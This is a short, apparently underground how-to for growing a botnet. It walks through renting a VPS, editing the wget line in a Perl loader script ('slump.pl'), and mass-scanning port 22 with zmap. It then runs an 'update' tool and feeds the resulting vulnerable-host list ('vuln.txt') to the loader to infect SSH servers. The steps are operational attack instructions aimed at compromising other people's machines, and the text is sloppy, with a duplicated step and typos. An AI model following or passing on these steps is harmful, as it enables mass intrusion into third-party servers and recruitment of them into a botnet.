Steps made by Ports VPNs
Purchased a VPS (Centos 6.9) at https://www.digitalocean.com/
!!! You don't need to scan and load on the same VOS as your botnet, you need 1 VPS just for scanning !!!

1. drag files 

2.change wget in (slump.pl)

3.sh Scanner.sh

4.sh Scanner.sh

5.sh zmap.sh.sh

6.drag (vuln.txt) and some list

---

cd

cd /root/Scanner/List

mv (list) /root/Scanner

cd

cd /root/Scanner

7.chmod 777 *

8.zmap -p22 -w (your list) -o mfu.txt -B100M

9. ./update 15000

10. perl slump.pl vuln.txt